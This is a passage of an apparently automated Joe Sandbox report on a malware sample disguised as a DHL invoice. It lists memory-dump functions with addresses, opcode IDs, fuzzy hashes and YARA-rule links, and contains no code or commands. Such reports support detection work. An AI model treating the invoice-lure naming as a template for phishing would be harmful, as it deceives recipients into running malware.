Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
Instruction ID: a72ca7b002f85c3bc27f757712ed1995b2926b45196d625fdc0dc035f908341e
Opcode Fuzzy Hash: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
Instruction Fuzzy Hash: 4BE0C9B4E19208EFCB84DFA8D44069CFBF4EB48310F10C0A9AC59A3350D6769A51DF80

Function 00A56E81 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a444b0a268ff6b0374613074281194462e06cbf01c4fe89e861ef3d39928b8cf
Instruction ID: a0d2db42a72db530cbe8ff4c4d145224243f17035f64efda6df75f9bf893dcd6
Opcode Fuzzy Hash: a444b0a268ff6b0374613074281194462e06cbf01c4fe89e861ef3d39928b8cf
Instruction Fuzzy Hash: 79F0DF7489022BCFDB659F20CC89BE9B7B0BB05340F0041F5E90AA2250D7300E858F40

Function 05C21930 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e51abed8e07139533765bfdd4fbdfc91bf39367d8bf47ee36ccf1fad34736e
Instruction ID: e27f170865c65e9743d1ee889c900f62d8cf0d8b8ef810950f47e5117e63f3e0
Opcode Fuzzy Hash: 50e51abed8e07139533765bfdd4fbdfc91bf39367d8bf47ee36ccf1fad34736e
Instruction Fuzzy Hash: C9E092B1A09244DFC701DBA8EA0139D7BB0EB86300B1541D9E408D7351DA302F04AB62

Function 05C260E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c552d88906143755bcac31fa8cddda8d9ea45b3c21ee440aabc95b03b180956a
Instruction ID: 511297be556202814830a0569a4993dd438feca3e3865a96f2a50df08ad948e5
Opcode Fuzzy Hash: c552d88906143755bcac31fa8cddda8d9ea45b3c21ee440aabc95b03b180956a
Instruction Fuzzy Hash: 79E0B6B181D3C09FC34356748C1558A3F25ABA321171B45EFD4A18F2A7D6155947DB22

Function 06237544 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 734cc3544a5f207672d90c599f2a7090a8b776f06bdff5a3bd4b0fd0cd08edd2
Instruction ID: 8f848a2a2ffd4dda2c8ca04f0724015d9f608ed01edc0114b341ab7fce0ef4a9
Opcode Fuzzy Hash: 734cc3544a5f207672d90c599f2a7090a8b776f06bdff5a3bd4b0fd0cd08edd2
Instruction Fuzzy Hash: 38F05E70900129CFEB28DF54D5487DAB3F1EB05304F1080E6D948A3640DB344F809F11

Function 05C121FB Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c2379a54518ae4217c95dff4c17a6563e5d8c3622668fd96b4cfc7f5d9602eb
Instruction ID: 2fadc48f7fb4a5628093a10e08fca0b359ff88d877eb0ce963b93d41cf6b8c5c
Opcode Fuzzy Hash: 0c2379a54518ae4217c95dff4c17a6563e5d8c3622668fd96b4cfc7f5d9602eb
Instruction Fuzzy Hash: 38F0B2B4A442288FCF64EF64D895AAEBBBAAB49304F1005E9C60DA7354DB315EC1CF44

Function 05C20FF8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5504507e9d5f5cfd7df5bf2e5dc963bd439da8655c91de9d4cf3b0e8275564
Instruction ID: 953f3b2939ca0372301c5f533bea66dd3bb229ef8e4af5de5d15dc37570ced89
Opcode Fuzzy Hash: 2b5504507e9d5f5cfd7df5bf2e5dc963bd439da8655c91de9d4cf3b0e8275564
Instruction Fuzzy Hash: BDE0E574E08208EFCB84DFA9D4806ACFBF4EB48310F24C4A9980993340D635AA42DF41

Function 05C25708 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06db85714543278a2e2b79f099a10327711d6bbb883f826f20d6433202fca09a
Instruction ID: 76fd4d56cedfb52ed3a4dc392460a8466f25c19f8bc1106581007c2cd8fdae24
Opcode Fuzzy Hash: 06db85714543278a2e2b79f099a10327711d6bbb883f826f20d6433202fca09a
Instruction Fuzzy Hash: 5AE08C363501109F8318DA4EE484C6B3BEDEFD9B62304006AF106CB220CE70EC01CB90

Function 0624FC08 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d895c6dfa3da47f38def994e450e276f939d4eb26db92884cd05759bde1faa1
Instruction ID: 02a84f76cf2e96395969c4b54a4404e6f385b0d74ba1fceef5721d4091ea5b49
Opcode Fuzzy Hash: 5d895c6dfa3da47f38def994e450e276f939d4eb26db92884cd05759bde1faa1
Instruction Fuzzy Hash: 93E04F74D18108ABC744EF94E9409ADBBB8EB85310F209499AC4457381CA319A51DB94

Function 05C1E628 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e192b994a9c9857138d06ecef11e9831f22011d8c3b3e8f60976a28231d73ffd
Instruction ID: 96d9efb3671d1e87d80dd553300ade413fd5f1bd3490834e61efc1e2e93fd754
Opcode Fuzzy Hash: e192b994a9c9857138d06ecef11e9831f22011d8c3b3e8f60976a28231d73ffd
Instruction Fuzzy Hash: EFE01A70D0920CEFCB54DFA8D44529DBBB9EB45300F1084A9DC0893300D6355A40DF40

Function 00A51800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d77441b1596785e8b42456763a7a869548cadb39f373cd91c2c00fe2153eab
Instruction ID: 2c9f45370e689949e36cb83ad23f40f4fedc86f5b603e167b5d6de1d5e8c4a5f
Opcode Fuzzy Hash: 54d77441b1596785e8b42456763a7a869548cadb39f373cd91c2c00fe2153eab
Instruction Fuzzy Hash: DAD05E357504108FC700D639E841F9A7BA59F89214B1582AAE009DB721C9679C038BD0

Function 05C20896 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220cf9b818842323697a51507a7f886b60c42bd66a467ff5da741c91684ba605
Instruction ID: e51700488d30160817a5175c24281e57145462537a8f2ab3beb5b788305aedb7
Opcode Fuzzy Hash: 220cf9b818842323697a51507a7f886b60c42bd66a467ff5da741c91684ba605
Instruction Fuzzy Hash: 0DF0F274A05318CFDB60DF98D488B9DBBB2FB09304F2404AAE018B3651DBB0AE81CF11

Function 05C2C250 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d1b2b60fe21dddb082accb7df92bebf266a1d7812c8c54886f32bf6312728f2
Instruction ID: 84f79b47bc88dc64d120cd41a5215534510e8a0041e22d61e6fd373d4cb0f241
Opcode Fuzzy Hash: 2d1b2b60fe21dddb082accb7df92bebf266a1d7812c8c54886f32bf6312728f2
Instruction Fuzzy Hash: 2BE0B675604A059F8358CF5EE440C52FBE9EF8D724315827EE54DC7B21EA31E806CB64

Function 062487C8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c64a77d8da65b663478d7546db0d7bd81e718b7a33611eab0e4a8408521fe1
Instruction ID: 1be0f3727fc08cf579aae3ee4b6fe768cfa5e876ad24953ca50c6c1613e01b67
Opcode Fuzzy Hash: 19c64a77d8da65b663478d7546db0d7bd81e718b7a33611eab0e4a8408521fe1
Instruction Fuzzy Hash: E7E01A78E18108AFC744DF98D4506ACFBB4AB48200F2080A9AC085B341DA35AA41DB80

Function 05C1F8A0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 498b7f9bffadd388f5ef753d0f05b4f70d917071cfcb526207aa952152d7f4b1
Instruction ID: a706d647464a6e218ec3f81f89af3c1f3354af09537becd84f903fde5193b9e7
Opcode Fuzzy Hash: 498b7f9bffadd388f5ef753d0f05b4f70d917071cfcb526207aa952152d7f4b1
Instruction Fuzzy Hash: 48E04F70908108DFD780DFE8D48069CBBF4AB0A300F2084ADDC08D3340DA319A81DB50

Function 05C264C8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d19a31c0386a82bf2d84561c6d543c06dcbf6fe820fa316415d9bca769fb4a12
Instruction ID: 44f725d0b839a31a3704e80be584563164e5008d41c19a8d9ef45b7f08272c7c
Opcode Fuzzy Hash: d19a31c0386a82bf2d84561c6d543c06dcbf6fe820fa316415d9bca769fb4a12
Instruction Fuzzy Hash: 6FD05B31344374ABDB34A6654D05B623399BF09B51F600C79D6475F285DD72E881C771

Function 05C20E48 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a530dec78bd052316d663f0fac7f70b3129e089677a10c6fcdbddcfd62d9236
Instruction ID: 85c44ac6eab49e014bfe99700c4443671a45057599e341a9c0364180fac77636
Opcode Fuzzy Hash: 9a530dec78bd052316d663f0fac7f70b3129e089677a10c6fcdbddcfd62d9236
Instruction Fuzzy Hash: 50E0867490C108EBCB04DF94E8449ADFB75EB45310F20D09DEC4427351C731AE91DB80

Function 05C2E1FD Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ee080e768d8b4f97dd5681ed6ce3e54545ebefafbc7771d23d722b94b53e3f4
Instruction ID: 75bb9f95701243130071fc3b27859bc37aa7e3c83df8d8f413d7daff08ec4f9c
Opcode Fuzzy Hash: 0ee080e768d8b4f97dd5681ed6ce3e54545ebefafbc7771d23d722b94b53e3f4
Instruction Fuzzy Hash: 6BE08C3A7000989F8F00DF68E4551EDBBA9FB89221B508069F955C3201CB30A91ACBA1

Function 05C20B58 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a530dec78bd052316d663f0fac7f70b3129e089677a10c6fcdbddcfd62d9236
Instruction ID: 5772b224652483759702f8a260a431e4badffdb47347e5e01014a2468225d4ab
Opcode Fuzzy Hash: 9a530dec78bd052316d663f0fac7f70b3129e089677a10c6fcdbddcfd62d9236
Instruction Fuzzy Hash: EDE0867490C108EBC714DF94D8449ACFB75EB45315F20D099EC0463351C6719E51DB80

Function 0624FED8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1deb9260a81ff4fbb2f99f59a4dd3b6068ce5e21db8db808d516cf7c7debbd79
Instruction ID: 5eba5bbb3be4360e1999eb1ab618ef16828005254eba44f54fbfe8ca56ffce83
Opcode Fuzzy Hash: 1deb9260a81ff4fbb2f99f59a4dd3b6068ce5e21db8db808d516cf7c7debbd79
Instruction Fuzzy Hash: 3FE08C34A18208EBC748EF98E9815ACBBB8EB85301F2090989C0913342CB31AE42DB91

Function 0624DD08 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1deb9260a81ff4fbb2f99f59a4dd3b6068ce5e21db8db808d516cf7c7debbd79
Instruction ID: 968cf41d6c21517596ed3cb72f2550c8f0a7f84f3525b4688217fde5035110c3
Opcode Fuzzy Hash: 1deb9260a81ff4fbb2f99f59a4dd3b6068ce5e21db8db808d516cf7c7debbd79
Instruction Fuzzy Hash: AFE0EC74919108DBC748EF94E985AACBBB8AB45314F209599AC0817351CA71AE52DB81

Function 05C1E6A8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea709b1a9dad1fe81fdba13750c0071debcc744e3b8685ae511df29b1f3c28e0
Instruction ID: 2b7d456c338997677ed5f98527dbbc26601e1e360977d8225e335e31667d8c95
Opcode Fuzzy Hash: ea709b1a9dad1fe81fdba13750c0071debcc744e3b8685ae511df29b1f3c28e0
Instruction Fuzzy Hash: ADE0EC74D1920CDFCB50EFF8D44569DBFB8AB05201F6055A9AC09D3350EA306A54DB55

Function 00A5F7F8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d4b8febeddfa8fb94b19c0cf26763afb0348a70436955f9a7253de24f52e17
Instruction ID: 5783563ea7564189143676fdaecddce6eee09f74dfbe3f3539bf769af7cc8234
Opcode Fuzzy Hash: 11d4b8febeddfa8fb94b19c0cf26763afb0348a70436955f9a7253de24f52e17
Instruction Fuzzy Hash: D5E092B4E09208EFCB54DFA8E54469DBBB5EB48301F2085AAE808A3350D7759A54DF91

Function 05C18EDA Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22717b19d068834d7b70cb71130a4656e0959ea854a24e4c4a04eefeb043463
Instruction ID: 9e63902619c8fd6ae790b673150afcd470ce2eb5e30e64107b3a16edc27eba8b
Opcode Fuzzy Hash: b22717b19d068834d7b70cb71130a4656e0959ea854a24e4c4a04eefeb043463
Instruction Fuzzy Hash: EEF05FB4D586288FDB68CF15DC8878ABBB2BB88301F1042DAD449A3750E7755E90DF05

Function 00A576EC Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8299e801e5f84622761180380a64452071d9971fe7562518c9d937c38f20d0c1
Instruction ID: 0e7b70ef2b286a2e073f2596a6301b95a5372aea8909b44d682a8f2ea9dbac46
Opcode Fuzzy Hash: 8299e801e5f84622761180380a64452071d9971fe7562518c9d937c38f20d0c1
Instruction Fuzzy Hash: 57E09A70809658CBDB508F148C88A9C3BB0FF12300F0460EACC4AAB382C73001858F45

Function 05C21D90 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2065ac06dc1d34a60633e4b07a58129a5cc4f392ab92812465e94e80a7cd492f
Instruction ID: d9f899ec85cbdd8e9cb4e0be5b7b25ded43ccbec9e5cb211b8e4744687606177
Opcode Fuzzy Hash: 2065ac06dc1d34a60633e4b07a58129a5cc4f392ab92812465e94e80a7cd492f
Instruction Fuzzy Hash: 44E01271A40308EFCB00DFB4D941BADBBBAEB85300F5085E8E9099B344DE316F05AB80

Function 00A5F2E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8bd438b224deab07a8fa8ca170ceac4dc2f2b789592708b6520043650a28278
Instruction ID: fa81fb454de47bf48e731e5c28cd887a9f014a13960b25e0666b5b5f3474ed74
Opcode Fuzzy Hash: f8bd438b224deab07a8fa8ca170ceac4dc2f2b789592708b6520043650a28278
Instruction Fuzzy Hash: 93E0EC70915208DFCB54EFB8954529CBBB4AB04305F2044A9E80892350E7319A84DB41

Function 00A57E9F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d21066e69624ca9e91d0a27e13cea3613aa86a1b7e09d596582c3352c43529d
Instruction ID: a36135dfb0b968101ebdeeb1178a9f93567daf7d09200d2e8f76d4badb9cfa9c
Opcode Fuzzy Hash: 6d21066e69624ca9e91d0a27e13cea3613aa86a1b7e09d596582c3352c43529d
Instruction Fuzzy Hash: C9E075749142288FCF68DF29D8986E877F0FF59305F0490DAC94AA7345DB315A85DF84

Function 05C21940 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5f13bce82dbc5fe267dc99377557bd492601a5e605603a3cefadf5e4881fb2
Instruction ID: 12368bdf31d000d6f5e63d7604e745dc7ba263025886c39dd7d7e67e8aa0eafa
Opcode Fuzzy Hash: 2e5f13bce82dbc5fe267dc99377557bd492601a5e605603a3cefadf5e4881fb2
Instruction Fuzzy Hash: 12E01271A00209EFCB00EFA4D94169DB7F9EB45300F1081A8E408D7305DE316F05AB91

Function 00A54A64 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b7e4fc3652f95827661fe846c23b65a3c3de3b0e6aba121890be5b37d28843
Instruction ID: 37cb501196b69666ef556b50315fa8be31b06e61f512796b69d28baf9dbb0ebb
Opcode Fuzzy Hash: 78b7e4fc3652f95827661fe846c23b65a3c3de3b0e6aba121890be5b37d28843
Instruction Fuzzy Hash: DAE0B674E003298ACB54CF21CC44BA8B7B2FB8A305F0480EB800B76A50DB301A85CF42

Function 05C1026D Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da3eae5fb9577a3a74cd0e0015d08ea7bdcb3934df29cbb0a2db27fdb012fb0
Instruction ID: 0d54e9cc64f20ae4e7642ef97bb4bd081b5a5c3ded9d09ccd6f8908b5979485d
Opcode Fuzzy Hash: 9da3eae5fb9577a3a74cd0e0015d08ea7bdcb3934df29cbb0a2db27fdb012fb0
Instruction Fuzzy Hash: 7FE0E2748012288BCB66CF60C950A9DB7BAAB16204F1001D8990873281C7315FC1CF14

Function 05C2F381 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56cb896daac9582c2923ec3fb2d0d9f2f1ccf32d39f4deadfc1f76c8dee91fdf
Instruction ID: 2fcf6402705f6529af500a7d3c8257c48e10ec3288f4a75a2f51774ff27545c8
Opcode Fuzzy Hash: 56cb896daac9582c2923ec3fb2d0d9f2f1ccf32d39f4deadfc1f76c8dee91fdf
Instruction Fuzzy Hash: 6AD0C97A005244AFD3029B64D804D857F78EB16225B1980E2E5488B273E6219814CB65

Function 00A5768C Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09447eb816d4fcb413569c292b9c40cd8e5ea9657c7701432984bcbbd8ea7a49
Instruction ID: 7b4670b9cd7aee8aa6859343520833eb297855c9a26e6dd962a8a9a11b2c8686
Opcode Fuzzy Hash: 09447eb816d4fcb413569c292b9c40cd8e5ea9657c7701432984bcbbd8ea7a49
Instruction Fuzzy Hash: 07D06C7090A299CAEB60CF248898B9D7BB0AF16314F1951E9984AA7381CB3059848F46

Function 05C1735B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc7a773c5348dd15cab4d10e7d045603ea6fe53efec9398012f6464247eae286
Instruction ID: 942fa7b1e2fabbd30cd492d9a27e79618d6e35d811643b39630d92c23004b521
Opcode Fuzzy Hash: dc7a773c5348dd15cab4d10e7d045603ea6fe53efec9398012f6464247eae286
Instruction Fuzzy Hash: 5ED06C78904318CFDB10DF50E888B9ABBB2BB4A304F104496D809A7724D7705A849F01

Function 00A50840 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b83102c109297bf53b61059f5ddbcbc7a328b321a285506c5e44648ad46c96f
Instruction ID: b7835cd4a668593a1cb431779f95c1cd2924e90e510314c94094a8468af87ff1
Opcode Fuzzy Hash: 3b83102c109297bf53b61059f5ddbcbc7a328b321a285506c5e44648ad46c96f
Instruction Fuzzy Hash: ACC0480450E3C19FD71396702D620982FF01C83600BAF48EB89C19A6A7E00D581EC322

Function 00A509C2 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 321d6abed9b18a672aa21bd1558076bd5722b7a291d00fbec2d7c8831c6a19ee
Instruction ID: 112c4de9863e50ba432e4b15bcbdd62bcf9c89a70246ac610603d3d756d57c98
Opcode Fuzzy Hash: 321d6abed9b18a672aa21bd1558076bd5722b7a291d00fbec2d7c8831c6a19ee
